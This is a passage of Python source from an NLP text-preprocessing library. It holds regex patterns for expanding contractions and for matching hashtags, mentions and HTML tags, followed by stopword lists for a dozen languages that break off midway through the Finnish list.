CONTRACTION_LL_WILL = re.compile(r"(\b)(he|i|she|they|we|what|who|you)'ll", re.IGNORECASE)
CONTRACTION_RE_ARE = re.compile(r"(\b)(they|we|what|who|you)'re", re.IGNORECASE)
CONTRACTION_VE_HAVE = re.compile(r"(\b)(i|should|they|we|what|who|would|you)'ve", re.IGNORECASE)
CONTRACTION_CANT_CANNOT = re.compile(r"(\b)(ca)n't", re.IGNORECASE)
CONTRACTION_M_AM = re.compile(r"(\b)(i)'m", re.IGNORECASE)
CONTRACTION_LET_LETUS = re.compile(r"(\b)(let)'s", re.IGNORECASE)
CONTRACTION_WONT_WILLNOT = re.compile(r"(\b)(w)on't", re.IGNORECASE)
CONTRACTION_SHANT_SHALLNOT = re.compile(r"(\b)(s)han't", re.IGNORECASE)
CONTRACTION_YALL_YOUALL = re.compile(r"(\b)(y)(?:'all|a'll)", re.IGNORECASE)

# SOCIAL DATA
HASHTAG_PATTERN = re.compile(r"#\w*")
AT_PATTERN = re.compile(r"@\w*")
HTML_TAG_PATTERN = re.compile(r"<.*?>")

# TEXT LOADER
TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$")


================================================
FILE: nlpretext/_config/stopwords.py
================================================
STOPWORDS = {
    "af": [
        "'n",
        "aan",
        "af",
        "al",
        "as",
        "baie",
        "by",
        "daar",
        "dag",
        "dat",
        "die",
        "dit",
        "een",
        "ek",
        "en",
        "gaan",
        "gesê",
        "haar",
        "het",
        "hom",
        "hulle",
        "hy",
        "in",
        "is",
        "jou",
        "jy",
        "kan",
        "kom",
        "ma",
        "maar",
        "met",
        "my",
        "na",
        "nie",
        "om",
        "ons",
        "op",
        "saam",
        "sal",
        "se",
        "sien",
        "so",
        "sy",
        "te",
        "toe",
        "uit",
        "van",
        "vir",
        "was",
        "wat",
        "ŉ",
    ],
    "ha": [
        "a",
        "amma",
        "ba",
        "ban",
        "ce",
        "cikin",
        "da",
        "don",
        "ga",
        "in",
        "ina",
        "ita",
        "ji",
        "ka",
        "ko",
        "kuma",
        "lokacin",
        "ma",
        "mai",
        "na",
        "ne",
        "ni",
        "sai",
        "shi",
        "su",
        "suka",
        "sun",
        "ta",
        "tafi",
        "take",
        "tana",
        "wani",
        "wannan",
        "wata",
        "ya",
        "yake",
        "yana",
        "yi",
        "za",
    ],
    "so": [
        "aad",
        "albaabkii",
        "atabo",
        "ay",
        "ayaa",
        "ayee",
        "ayuu",
        "dhan",
        "hadana",
        "in",
        "inuu",
        "isku",
        "jiray",
        "jirtay",
        "ka",
        "kale",
        "kasoo",
        "ku",
        "kuu",
        "lakin",
        "markii",
        "oo",
        "si",
        "soo",
        "uga",
        "ugu",
        "uu",
        "waa",
        "waxa",
        "waxuu",
    ],
    "st": [
        "a",
        "ba",
        "bane",
        "bona",
        "e",
        "ea",
        "eaba",
        "empa",
        "ena",
        "ha",
        "hae",
        "hape",
        "ho",
        "hore",
        "ka",
        "ke",
        "la",
        "le",
        "li",
        "me",
        "mo",
        "moo",
        "ne",
        "o",
        "oa",
        "re",
        "sa",
        "se",
        "tloha",
        "tsa",
        "tse",
    ],
    "sw": [
        "akasema",
        "alikuwa",
        "alisema",
        "baada",
        "basi",
        "bila",
        "cha",
        "chini",
        "hadi",
        "hapo",
        "hata",
        "hivyo",
        "hiyo",
        "huku",
        "huo",
        "ili",
        "ilikuwa",
        "juu",
        "kama",
        "karibu",
        "katika",
        "kila",
        "kima",
        "kisha",
        "kubwa",
        "kutoka",
        "kuwa",
        "kwa",
        "kwamba",
        "kwenda",
        "kwenye",
        "la",
        "lakini",
        "mara",
        "mdogo",
        "mimi",
        "mkubwa",
        "mmoja",
        "moja",
        "muda",
        "mwenye",
        "na",
        "naye",
        "ndani",
        "ng",
        "ni",
        "nini",
        "nonkungu",
        "pamoja",
        "pia",
        "sana",
        "sasa",
        "sauti",
        "tafadhali",
        "tena",
        "tu",
        "vile",
        "wa",
        "wakati",
        "wake",
        "walikuwa",
        "wao",
        "watu",
        "wengine",
        "wote",
        "ya",
        "yake",
        "yangu",
        "yao",
        "yeye",
        "yule",
        "za",
        "zaidi",
        "zake",
    ],
    "yo": [
        "a",
        "an",
        "bá",
        "bí",
        "bẹ̀rẹ̀",
        "fún",
        "fẹ́",
        "gbogbo",
        "inú",
        "jù",
        "jẹ",
        "jẹ́",
        "kan",
        "kì",
        "kí",
        "kò",
        "láti",
        "lè",
        "lọ",
        "mi",
        "mo",
        "máa",
        "mọ̀",
        "ni",
        "náà",
        "ní",
        "nígbà",
        "nítorí",
        "nǹkan",
        "o",
        "padà",
        "pé",
        "púpọ̀",
        "pẹ̀lú",
        "rẹ̀",
        "sì",
        "sí",
        "sínú",
        "ṣ",
        "ti",
        "tí",
        "wà",
        "wá",
        "wọn",
        "wọ́n",
        "yìí",
        "àti",
        "àwọn",
        "é",
        "í",
        "òun",
        "ó",
        "ń",
        "ńlá",
        "ṣe",
        "ṣé",
        "ṣùgbọ́n",
        "ẹmọ́",
        "ọjọ́",
        "ọ̀pọ̀lọpọ̀",
    ],
    "zu": [
        "futhi",
        "kahle",
        "kakhulu",
        "kanye",
        "khona",
        "kodwa",
        "kungani",
        "kusho",
        "la",
        "lakhe",
        "lapho",
        "mina",
        "ngesikhathi",
        "nje",
        "phansi",
        "phezulu",
        "u",
        "ukuba",
        "ukuthi",
        "ukuze",
        "uma",
        "wahamba",
        "wakhe",
        "wami",
        "wase",
        "wathi",
        "yakhe",
        "zakhe",
        "zonke",
    ],
    "da": [
        "af",
        "alle",
        "andet",
        "andre",
        "at",
        "begge",
        "da",
        "de",
        "den",
        "denne",
        "der",
        "deres",
        "det",
        "dette",
        "dig",
        "din",
        "dog",
        "du",
        "ej",
        "eller",
        "en",
        "end",
        "ene",
        "eneste",
        "enhver",
        "et",
        "fem",
        "fire",
        "flere",
        "fleste",
        "for",
        "fordi",
        "forrige",
        "fra",
        "få",
        "før",
        "god",
        "han",
        "hans",
        "har",
        "hendes",
        "her",
        "hun",
        "hvad",
        "hvem",
        "hver",
        "hvilken",
        "hvis",
        "hvor",
        "hvordan",
        "hvorfor",
        "hvornår",
        "i",
        "ikke",
        "ind",
        "ingen",
        "intet",
        "jeg",
        "jeres",
        "kan",
        "kom",
        "kommer",
        "lav",
        "lidt",
        "lille",
        "man",
        "mand",
        "mange",
        "med",
        "meget",
        "men",
        "mens",
        "mere",
        "mig",
        "ned",
        "ni",
        "nogen",
        "noget",
        "ny",
        "nyt",
        "nær",
        "næste",
        "næsten",
        "og",
        "op",
        "otte",
        "over",
        "på",
        "se",
        "seks",
        "ses",
        "som",
        "stor",
        "store",
        "syv",
        "ti",
        "til",
        "to",
        "tre",
        "ud",
        "var",
    ],
    "de": [
        "Ernst",
        "Ordnung",
        "Schluss",
        "a",
        "ab",
        "aber",
        "ach",
        "acht",
        "achte",
        "achten",
        "achter",
        "achtes",
        "ag",
        "alle",
        "allein",
        "allem",
        "allen",
        "aller",
        "allerdings",
        "alles",
        "allgemeinen",
        "als",
        "also",
        "am",
        "an",
        "andere",
        "anderen",
        "andern",
        "anders",
        "au",
        "auch",
        "auf",
        "aus",
        "ausser",
        "ausserdem",
        "außer",
        "außerdem",
        "b",
        "bald",
        "bei",
        "beide",
        "beiden",
        "beim",
        "beispiel",
        "bekannt",
        "bereits",
        "besonders",
        "besser",
        "besten",
        "bin",
        "bis",
        "bisher",
        "bist",
        "c",
        "d",
        "d.h",
        "da",
        "dabei",
        "dadurch",
        "dafür",
        "dagegen",
        "daher",
        "dahin",
        "dahinter",
        "damals",
        "damit",
        "danach",
        "daneben",
        "dank",
        "dann",
        "daran",
        "darauf",
        "daraus",
        "darf",
        "darfst",
        "darin",
        "darum",
        "darunter",
        "darüber",
        "das",
        "dasein",
        "daselbst",
        "dass",
        "dasselbe",
        "davon",
        "davor",
        "dazu",
        "dazwischen",
        "daß",
        "dein",
        "deine",
        "deinem",
        "deiner",
        "dem",
        "dementsprechend",
        "demgegenüber",
        "demgemäss",
        "demgemäß",
        "demselben",
        "demzufolge",
        "den",
        "denen",
        "denn",
        "denselben",
        "der",
        "deren",
        "derjenige",
        "derjenigen",
        "dermassen",
        "dermaßen",
        "derselbe",
        "derselben",
        "des",
        "deshalb",
        "desselben",
        "dessen",
        "deswegen",
        "dich",
        "die",
        "diejenige",
        "diejenigen",
        "dies",
        "diese",
        "dieselbe",
        "dieselben",
        "diesem",
        "diesen",
        "dieser",
        "dieses",
        "dir",
        "doch",
        "dort",
        "drei",
        "drin",
        "dritte",
        "dritten",
        "dritter",
        "drittes",
        "du",
        "durch",
        "durchaus",
        "durfte",
        "durften",
        "dürfen",
        "dürft",
        "e",
        "eben",
        "ebenso",
        "ehrlich",
        "ei",
        "ei,",
        "eigen",
        "eigene",
        "eigenen",
        "eigener",
        "eigenes",
        "ein",
        "einander",
        "eine",
        "einem",
        "einen",
        "einer",
        "eines",
        "einige",
        "einigen",
        "einiger",
        "einiges",
        "einmal",
        "eins",
        "elf",
        "en",
        "ende",
        "endlich",
        "entweder",
        "er",
        "erst",
        "erste",
        "ersten",
        "erster",
        "erstes",
        "es",
        "etwa",
        "etwas",
        "euch",
        "euer",
        "eure",
        "f",
        "folgende",
        "früher",
        "fünf",
        "fünfte",
        "fünften",
        "fünfter",
        "fünftes",
        "für",
        "g",
        "gab",
        "ganz",
        "ganze",
        "ganzen",
        "ganzer",
        "ganzes",
        "gar",
        "gedurft",
        "gegen",
        "gegenüber",
        "gehabt",
        "gehen",
        "geht",
        "gekannt",
        "gekonnt",
        "gemacht",
        "gemocht",
        "gemusst",
        "genug",
        "gerade",
        "gern",
        "gesagt",
        "geschweige",
        "gewesen",
        "gewollt",
        "geworden",
        "gibt",
        "ging",
        "gleich",
        "gott",
        "gross",
        "grosse",
        "grossen",
        "grosser",
        "grosses",
        "groß",
        "große",
        "großen",
        "großer",
        "großes",
        "gut",
        "gute",
        "guter",
        "gutes",
        "h",
        "habe",
        "haben",
        "habt",
        "hast",
        "hat",
        "hatte",
        "hatten",
        "hattest",
        "hattet",
        "heisst",
        "her",
        "heute",
        "hier",
        "hin",
        "hinter",
        "hoch",
        "hätte",
        "hätten",
        "i",
        "ich",
        "ihm",
        "ihn",
        "ihnen",
        "ihr",
        "ihre",
        "ihrem",
        "ihren",
        "ihrer",
        "ihres",
        "im",
        "immer",
        "in",
        "indem",
        "infolgedessen",
        "ins",
        "irgend",
        "ist",
        "j",
        "ja",
        "jahr",
        "jahre",
        "jahren",
        "je",
        "jede",
        "jedem",
        "jeden",
        "jeder",
        "jedermann",
        "jedermanns",
        "jedes",
        "jedoch",
        "jemand",
        "jemandem",
        "jemanden",
        "jene",
        "jenem",
        "jenen",
        "jener",
        "jenes",
        "jetzt",
        "k",
        "kam",
        "kann",
        "kannst",
        "kaum",
        "kein",
        "keine",
        "keinem",
        "keinen",
        "keiner",
        "kleine",
        "kleinen",
        "kleiner",
        "kleines",
        "kommen",
        "kommt",
        "konnte",
        "konnten",
        "kurz",
        "können",
        "könnt",
        "könnte",
        "l",
        "lang",
        "lange",
        "leicht",
        "leide",
        "lieber",
        "los",
        "m",
        "machen",
        "macht",
        "machte",
        "mag",
        "magst",
        "mahn",
        "mal",
        "man",
        "manche",
        "manchem",
        "manchen",
        "mancher",
        "manches",
        "mann",
        "mehr",
        "mein",
        "meine",
        "meinem",
        "meinen",
        "meiner",
        "meines",
        "mensch",
        "menschen",
        "mich",
        "mir",
        "mit",
        "mittel",
        "mochte",
        "mochten",
        "morgen",
        "muss",
        "musst",
        "musste",
        "mussten",
        "muß",
        "mußt",
        "möchte",
        "mögen",
        "möglich",
        "mögt",
        "müssen",
        "müsst",
        "müßt",
        "n",
        "na",
        "nach",
        "nachdem",
        "nahm",
        "natürlich",
        "neben",
        "nein",
        "neue",
        "neuen",
        "neun",
        "neunte",
        "neunten",
        "neunter",
        "neuntes",
        "nicht",
        "nichts",
        "nie",
        "niemand",
        "niemandem",
        "niemanden",
        "noch",
        "nun",
        "nur",
        "o",
        "ob",
        "oben",
        "oder",
        "offen",
        "oft",
        "ohne",
        "p",
        "q",
        "r",
        "recht",
        "rechte",
        "rechten",
        "rechter",
        "rechtes",
        "richtig",
        "rund",
        "s",
        "sa",
        "sache",
        "sagt",
        "sagte",
        "sah",
        "satt",
        "schlecht",
        "schon",
        "sechs",
        "sechste",
        "sechsten",
        "sechster",
        "sechstes",
        "sehr",
        "sei",
        "seid",
        "seien",
        "sein",
        "seine",
        "seinem",
        "seinen",
        "seiner",
        "seines",
        "seit",
        "seitdem",
        "selbst",
        "sich",
        "sie",
        "sieben",
        "siebente",
        "siebenten",
        "siebenter",
        "siebentes",
        "sind",
        "so",
        "solang",
        "solche",
        "solchem",
        "solchen",
        "solcher",
        "solches",
        "soll",
        "sollen",
        "sollst",
        "sollt",
        "sollte",
        "sollten",
        "sondern",
        "sonst",
        "soweit",
        "sowie",
        "später",
        "startseite",
        "statt",
        "steht",
        "suche",
        "t",
        "tag",
        "tage",
        "tagen",
        "tat",
        "teil",
        "tel",
        "tritt",
        "trotzdem",
        "tun",
        "u",
        "uhr",
        "um",
        "und",
        "und?",
        "uns",
        "unser",
        "unsere",
        "unserer",
        "unter",
        "v",
        "vergangenen",
        "viel",
        "viele",
        "vielem",
        "vielen",
        "vielleicht",
        "vier",
        "vierte",
        "vierten",
        "vierter",
        "viertes",
        "vom",
        "von",
        "vor",
        "w",
        "wahr?",
        "wann",
        "war",
        "waren",
        "wart",
        "warum",
        "was",
        "wegen",
        "weil",
        "weit",
        "weiter",
        "weitere",
        "weiteren",
        "weiteres",
        "welche",
        "welchem",
        "welchen",
        "welcher",
        "welches",
        "wem",
        "wen",
        "wenig",
        "wenige",
        "weniger",
        "weniges",
        "wenigstens",
        "wenn",
        "wer",
        "werde",
        "werden",
        "werdet",
        "weshalb",
        "wessen",
        "wie",
        "wieder",
        "wieso",
        "will",
        "willst",
        "wir",
        "wird",
        "wirklich",
        "wirst",
        "wissen",
        "wo",
        "wohl",
        "wollen",
        "wollt",
        "wollte",
        "wollten",
        "worden",
        "wurde",
        "wurden",
        "während",
        "währenddem",
        "währenddessen",
        "wäre",
        "würde",
        "würden",
        "x",
        "y",
        "z",
        "z.b",
        "zehn",
        "zehnte",
        "zehnten",
        "zehnter",
        "zehntes",
        "zeit",
        "zu",
        "zuerst",
        "zugleich",
        "zum",
        "zunächst",
        "zur",
        "zurück",
        "zusammen",
        "zwanzig",
        "zwar",
        "zwei",
        "zweite",
        "zweiten",
        "zweiter",
        "zweites",
        "zwischen",
        "zwölf",
        "über",
        "überhaupt",
        "übrigens",
    ],
    "es": [
        "a",
        "actualmente",
        "acuerdo",
        "adelante",
        "ademas",
        "además",
        "adrede",
        "afirmó",
        "agregó",
        "ahi",
        "ahora",
        "ahí",
        "al",
        "algo",
        "alguna",
        "algunas",
        "alguno",
        "algunos",
        "algún",
        "alli",
        "allí",
        "alrededor",
        "ambos",
        "ampleamos",
        "antano",
        "antaño",
        "ante",
        "anterior",
        "antes",
        "apenas",
        "aproximadamente",
        "aquel",
        "aquella",
        "aquellas",
        "aquello",
        "aquellos",
        "aqui",
        "aquél",
        "aquélla",
        "aquéllas",
        "aquéllos",
        "aquí",
        "arriba",
        "arribaabajo",
        "aseguró",
        "asi",
        "así",
        "atras",
        "aun",
        "aunque",
        "ayer",
        "añadió",
        "aún",
        "b",
        "bajo",
        "bastante",
        "bien",
        "breve",
        "buen",
        "buena",
        "buenas",
        "bueno",
        "buenos",
        "c",
        "cada",
        "casi",
        "cerca",
        "cierta",
        "ciertas",
        "cierto",
        "ciertos",
        "cinco",
        "claro",
        "comentó",
        "como",
        "con",
        "conmigo",
        "conocer",
        "conseguimos",
        "conseguir",
        "considera",
        "consideró",
        "consigo",
        "consigue",
        "consiguen",
        "consigues",
        "contigo",
        "contra",
        "cosas",
        "creo",
        "cual",
        "cuales",
        "cualquier",
        "cuando",
        "cuanta",
        "cuantas",
        "cuanto",
        "cuantos",
        "cuatro",
        "cuenta",
        "cuál",
        "cuáles",
        "cuándo",
        "cuánta",
        "cuántas",
        "cuánto",
        "cuántos",
        "cómo",
        "d",
        "da",
        "dado",
        "dan",
        "dar",
        "de",
        "debajo",
        "debe",
        "deben",
        "debido",
        "decir",
        "dejó",
        "del",
        "delante",
        "demasiado",
        "demás",
        "dentro",
        "deprisa",
        "desde",
        "despacio",
        "despues",
        "después",
        "detras",
        "detrás",
        "dia",
        "dias",
        "dice",
        "dicen",
        "dicho",
        "dieron",
        "diferente",
        "diferentes",
        "dijeron",
        "dijo",
        "dio",
        "donde",
        "dos",
        "durante",
        "día",
        "días",
        "dónde",
        "e",
        "ejemplo",
        "el",
        "ella",
        "ellas",
        "ello",
        "ellos",
        "embargo",
        "empleais",
        "emplean",
        "emplear",
        "empleas",
        "empleo",
        "en",
        "encima",
        "encuentra",
        "enfrente",
        "enseguida",
        "entonces",
        "entre",
        "era",
        "eramos",
        "eran",
        "eras",
        "eres",
        "es",
        "esa",
        "esas",
        "ese",
        "eso",
        "esos",
        "esta",
        "estaba",
        "estaban",
        "estado",
        "estados",
        "estais",
        "estamos",
        "estan",
        "estar",
        "estará",
        "estas",
        "este",
        "esto",
        "estos",
        "estoy",
        "estuvo",
        "está",
        "están",
        "ex",
        "excepto",
        "existe",
        "existen",
        "explicó",
        "expresó",
        "f",
        "fin",
        "final",
        "fue",
        "fuera",
        "fueron",
        "fui",
        "fuimos",
        "g",
        "general",
        "gran",
        "grandes",
        "gueno",
        "h",
        "ha",
        "haber",
        "habia",
        "habla",
        "hablan",
        "habrá",
        "había",
        "habían",
        "hace",
        "haceis",
        "hacemos",
        "hacen",
        "hacer",
        "hacerlo",
        "haces",
        "hacia",
        "haciendo",
        "hago",
        "han",
        "hasta",
        "hay",
        "haya",
        "he",
        "hecho",
        "hemos",
        "hicieron",
        "hizo",
        "horas",
        "hoy",
        "hubo",
        "i",
        "igual",
        "incluso",
        "indicó",
        "informo",
        "informó",
        "intenta",
        "intentais",
        "intentamos",
        "intentan",
        "intentar",
        "intentas",
        "intento",
        "ir",
        "j",
        "junto",
        "k",
        "l",
        "la",
        "lado",
        "largo",
        "las",
        "le",
        "lejos",
        "les",
        "llegó",
        "lleva",
        "llevar",
        "lo",
        "los",
        "luego",
        "lugar",
        "m",
        "mal",
        "manera",
        "manifestó",
        "mas",
        "mayor",
        "me",
        "mediante",
        "medio",
        "mejor",
        "mencionó",
        "menos",
        "menudo",
        "mi",
        "mia",
        "mias",
        "mientras",
        "mio",
        "mios",
        "mis",
        "misma",
        "mismas",
        "mismo",
        "mismos",
        "modo",
        "momento",
        "mucha",
        "muchas",
        "mucho",
        "muchos",
        "muy",
        "más",
        "mí",
        "mía",
        "mías",
        "mío",
        "míos",
        "n",
        "nada",
        "nadie",
        "ni",
        "ninguna",
        "ningunas",
        "ninguno",
        "ningunos",
        "ningún",
        "no",
        "nos",
        "nosotras",
        "nosotros",
        "nuestra",
        "nuestras",
        "nuestro",
        "nuestros",
        "nueva",
        "nuevas",
        "nuevo",
        "nuevos",
        "nunca",
        "o",
        "ocho",
        "os",
        "otra",
        "otras",
        "otro",
        "otros",
        "p",
        "pais",
        "para",
        "parece",
        "parte",
        "partir",
        "pasada",
        "pasado",
        "paìs",
        "peor",
        "pero",
        "pesar",
        "poca",
        "pocas",
        "poco",
        "pocos",
        "podeis",
        "podemos",
        "poder",
        "podria",
        "podriais",
        "podriamos",
        "podrian",
        "podrias",
        "podrá",
        "podrán",
        "podría",
        "podrían",
        "poner",
        "por",
        "porque",
        "posible",
        "primer",
        "primera",
        "primero",
        "primeros",
        "principalmente",
        "pronto",
        "propia",
        "propias",
        "propio",
        "propios",
        "proximo",
        "próximo",
        "próximos",
        "pudo",
        "pueda",
        "puede",
        "pueden",
        "puedo",
        "pues",
        "q",
        "qeu",
        "que",
        "quedó",
        "queremos",
        "quien",
        "quienes",
        "quiere",
        "quiza",
        "quizas",
        "quizá",
        "quizás",
        "quién",
        "quiénes",
        "qué",
        "r",
        "raras",
        "realizado",
        "realizar",
        "realizó",
        "repente",
        "respecto",
        "s",
        "sabe",
        "sabeis",
        "sabemos",
        "saben",
        "saber",
        "sabes",
        "salvo",
        "se",
        "sea",
        "sean",
        "segun",
        "segunda",
        "segundo",
        "según",
        "seis",
        "ser",
        "sera",
        "será",
        "serán",
        "sería",
        "señaló",
        "si",
        "sido",
        "siempre",
        "siendo",
        "siete",
        "sigue",
        "siguiente",
        "sin",
        "sino",
        "sobre",
        "sois",
        "sola",
        "solamente",
        "solas",
        "solo",
        "solos",
        "somos",
        "son",
        "soy",
        "soyos",
        "su",
        "supuesto",
        "sus",
        "suya",
        "suyas",
        "suyo",
        "sé",
        "sí",
        "sólo",
        "t",
        "tal",
        "tambien",
        "también",
        "tampoco",
        "tan",
        "tanto",
        "tarde",
        "te",
        "temprano",
        "tendrá",
        "tendrán",
        "teneis",
        "tenemos",
        "tener",
        "tenga",
        "tengo",
        "tenido",
        "tenía",
        "tercera",
        "ti",
        "tiempo",
        "tiene",
        "tienen",
        "toda",
        "todas",
        "todavia",
        "todavía",
        "todo",
        "todos",
        "total",
        "trabaja",
        "trabajais",
        "trabajamos",
        "trabajan",
        "trabajar",
        "trabajas",
        "trabajo",
        "tras",
        "trata",
        "través",
        "tres",
        "tu",
        "tus",
        "tuvo",
        "tuya",
        "tuyas",
        "tuyo",
        "tuyos",
        "tú",
        "u",
        "ultimo",
        "un",
        "una",
        "unas",
        "uno",
        "unos",
        "usa",
        "usais",
        "usamos",
        "usan",
        "usar",
        "usas",
        "uso",
        "usted",
        "ustedes",
        "v",
        "va",
        "vais",
        "valor",
        "vamos",
        "van",
        "varias",
        "varios",
        "vaya",
        "veces",
        "ver",
        "verdad",
        "verdadera",
        "verdadero",
        "vez",
        "vosotras",
        "vosotros",
        "voy",
        "vuestra",
        "vuestras",
        "vuestro",
        "vuestros",
        "w",
        "x",
        "y",
        "ya",
        "yo",
        "z",
        "él",
        "ésa",
        "ésas",
        "ése",
        "ésos",
        "ésta",
        "éstas",
        "éste",
        "éstos",
        "última",
        "últimas",
        "último",
        "últimos",
    ],
    "et": [
        "aga",
        "ei",
        "et",
        "ja",
        "jah",
        "kas",
        "kui",
        "kõik",
        "ma",
        "me",
        "mida",
        "midagi",
        "mind",
        "minu",
        "mis",
        "mu",
        "mul",
        "mulle",
        "nad",
        "nii",
        "oled",
        "olen",
        "oli",
        "oma",
        "on",
        "pole",
        "sa",
        "seda",
        "see",
        "selle",
        "siin",
        "siis",
        "ta",
        "te",
        "ära",
    ],
    "fi": [
        "aiemmin",
        "aika",
        "aikaa",
        "aikaan",
        "aikaisemmin",
        "aikaisin",
        "aikajen",
        "aikana",
        "aikoina",
        "aikoo",
        "aikovat",
        "aina",
        "ainakaan",
        "ainakin",
        "ainoa",
        "ainoat",
        "aiomme",
        "aion",
        "aiotte",
        "aist",
        "aivan",
        "ajan",
        "alas",
        "alemmas",
        "alkuisin",
        "alkuun",
        "alla",
        "alle",
        "aloitamme",
        "aloitan",
        "aloitat",
        "aloitatte",
        "aloitattivat",
        "aloitettava",
        "aloitettevaksi",
        "aloitettu",
        "aloitimme",
        "aloitin",
        "aloitit",
        "aloititte",
        "aloittaa",
        "aloittamatta",
        "aloitti",
        "aloittivat",
        "alta",
        "aluksi",
        "alussa",
        "alusta",
        "annettavaksi",
        "annetteva",
        "annettu",
        "ansiosta",
        "antaa",
        "antamatta",
        "antoi",
        "aoua",
        "apu",
        "asia",
        "asiaa",
        "asian",
        "asiasta",
        "asiat",
        "asioiden",
        "asioihin",
        "asioita",
        "asti",
        "avuksi",
        "avulla",
        "avun",
        "avutta",
        "edelle",
        "edelleen",
        "edellä",
        "edeltä",
        "edemmäs",
        "edes",
        "edessä",
        "edestä",
        "ehkä",
        "ei",
        "eikä",
        "eilen",
        "eivät",
        "eli",
        "ellei",
        "elleivät",
        "ellemme",
        "ellen",
        "ellet",
        "ellette",
        "emme",
        "en",
        "enemmän",
        "eniten",
        "ennen",
        "ensi",
        "ensimmäinen",
        "ensimmäiseksi",
        "ensimmäisen",
        "ensimmäisenä",
        "ensimmäiset",
        "ensimmäisiksi",
        "ensimmäisinä",
        "ensimmäisiä",
        "ensimmäistä",
        "ensin",
        "entinen",
        "entisen",
        "entisiä",
        "entisten",
        "entistä",
        "enää",
        "eri",
        "erittäin",
        "erityisesti",
        "eräiden",
        "eräs",
        "eräät",
        "esi",
        "esiin",
        "esillä",
        "esimerkiksi",
        "et",
        "eteen",
        "etenkin",
        "etessa",
        "ette",
        "ettei",
        "että",
        "haikki",
        "halua",
        "haluaa",
        "haluamatta",
        "haluamme",
        "haluan",
        "haluat",
        "haluatte",
        "haluavat",
        "halunnut",
        "halusi",
        "halusimme",
        "halusin",
        "halusit",
        "halusitte",
        "halusivat",
        "halutessa",
        "haluton",
        "he",
        "hei",
        "heidän",
        "heihin",
        "heille",
        "heiltä",
        "heissä",
        "heistä",
        "heitä",
        "helposti",
        "heti",
        "hetkellä",
        "hieman",
        "hitaasti",
        "hoikein",
        "huolimatta",
        "huomenna",
        "hyvien",
        "hyviin",
        "hyviksi",
        "hyville",
        "hyviltä",
        "hyvin",
        "hyvinä",
        "hyvissä",
        "hyvistä",
        "hyviä",
        "hyvä",
        "hyvät",
        "hyvää",
        "hän",
        "häneen",
        "hänelle",
        "hänellä",
        "häneltä",
        "hänen",
        "hänessä",
        "hänestä",
        "hänet",
        "ihan",
        "ilman",
        "ilmeisesti",
        "itse",
        "itsensä",
        "itseään",
        "ja",
        "jo",
        "johon",
        "joiden",
        "joihin",
        "joiksi",
        "joilla",
        "joille",
        "joilta",
        "joissa",
        "joista",
        "joita",
        "joka",
        "jokainen",
        "jokin",
        "joko",
        "joku",
        "jolla",
        "jolle",
        "jolloin",
        "jolta",
        "jompikumpi",
        "jonka",
        "jonkin",
        "jonne",
        "joo",
        "jopa",
        "jos",
        "joskus",
        "jossa",
        "josta",
        "jota",
        "jotain",
        "joten",
        "jotenkin",
        "jotenkuten",
        "jotka",
        "jotta",
        "jouduimme",
        "jouduin",
        "jouduit",
        "jouduitte",
        "joudumme",
        "joudun",
        "joudutte",
        "joukkoon",
        "joukossa",
        "joukosta",
        "joutua",
        "joutui",
        "joutuivat",
        "joutumaan",
        "joutuu",
        "joutuvat",
        "juuri",
        "jälkeen",
        "jälleen",
        "jää",
        "kahdeksan",
        "kahdeksannen",
        "kahdella",
        "kahdelle",
        "kahdelta",
        "kahden",
        "kahdessa",
        "kahdesta",
        "kahta",
        "kahteen",
        "kai",
        "kaiken",
        "kaikille",
        "kaikilta",
        "kaikkea",
        "kaikki",
        "kaikkia",
        "kaikkiaan",
        "kaikkialla",
        "kaikkialle",
        "kaikkialta",
        "kaikkien",
        "kaikkin",
        "kaksi",
        "kannalta",
        "kannattaa",
        "kanssa",
        "kanssaan",
        "kanssamme",
        "kanssani",
        "kanssanne",
        "kanssasi",
        "kauan",
        "kauemmas",
        "kaukana",
        "kautta",
        "kehen",
        "keiden",
        "keihin",
        "keiksi",
        "keille",
        "keillä",
        "keiltä",
        "keinä",
        "keissä",
        "keistä",
        "keitten",
        "keittä",
        "keitä",
        "keneen",
        "keneksi",
        "kenelle",
        "kenellä",
        "keneltä",
        "kenen",
        "kenenä",
        "kenessä",
        "kenestä",
        "kenet",
        "kenettä",
        "kennessästä",
        "kenties",
        "kerran",
        "kerta",
        "kertaa",
        "keskellä",
        "kesken",
        "keskimäärin",
        "ketkä",
        "ketä",
        "kiitos",
        "kohti",
        "koko",
        "kokonaan",
        "kolmas",
        "kolme",
        "kolmen",
        "kolmesti",
        "koska",
        "koskaan",
        "kovin",
        "kuin",
        "kuinka",
        "kuinkan",
        "kuitenkaan",
        "kuitenkin",
        "kuka",
        "kukaan",
        "kukin",
        "kukka",
        "kumpainen",
        "kumpainenkaan",
        "kumpi",
        "kumpikaan",
        "kumpikin",
        "kun",
        "kuten",
        "kuuden",
        "kuusi",
        "kuutta",
        "kylliksi",
        "kyllä",
        "kymmenen",
        "kyse",
        "liian",
        "liki",
        "lisäksi",
        "lisää",
        "lla",
        "luo",
        "luona",
        "lähekkäin",
        "lähelle",
        "lähellä",
        "läheltä",
        "lähemmäs",
        "lähes",
        "lähinnä",
        "lähtien",
        "läpi",
        "mahdollisimman",
        "mahdollista",
        "me",
        "meidän",
        "meille",
        "meillä",
        "melkein",
        "melko",
        "menee",
        "meneet",
        "menemme",
        "menen",
        "menet",
        "menette",
        "menevät",
        "meni",
        "menimme",
        "menin",
        "menit",
        "menivät",
        "mennessä",
        "mennyt",
        "menossa",
        "mihin",
        "mikin",
        "miksi",
        "mikä",
        "mikäli",
        "mikään",
        "milloin",
        "milloinkan",
        "minne",
        "minun",
        "minut",
        "minä",
        "missä",
        "mistä",
        "miten",
        "mitä",
        "mitään",
        "moi",
        "molemmat",
        "mones",
        "monesti",
        "monet",
        "moni",
        "moniaalla",
        "moniaalle",
        "moniaalta",
        "monta",
        "muassa",
        "muiden",
        "muita",
        "muka",
        "mukaan",
        "mukaansa",
        "mukana",
        "mutta",
        "muu",
        "muualla",
        "muualle",
        "muualta",
        "muuanne",
        "muulloin",
        "muun",
        "muut",
        "muuta",
        "muutama",
        "muutaman",
        "muuten",
        "myöhemmin",
        "myös",
        "myöskin",
        "myöskään",
        "myötä",
        "ne",
        "neljä",
        "neljän",
        "neljää",
        "niiden",
        "niin",
        "niistä",
        "niitä",
        "noin",
        "nopeammin",
        "nopeasti",
        "nopeiten",
        "nro",
        "nuo",
        "nyt",
        "näiden",
        "näin",
        "näissä",
        "näissähin",
        "näissälle",
        "näissältä",
        "näissästä",
        "näitä",
        "nämä",
        "ohi",
        "oikea",
        "oikealla",
        "oikein",
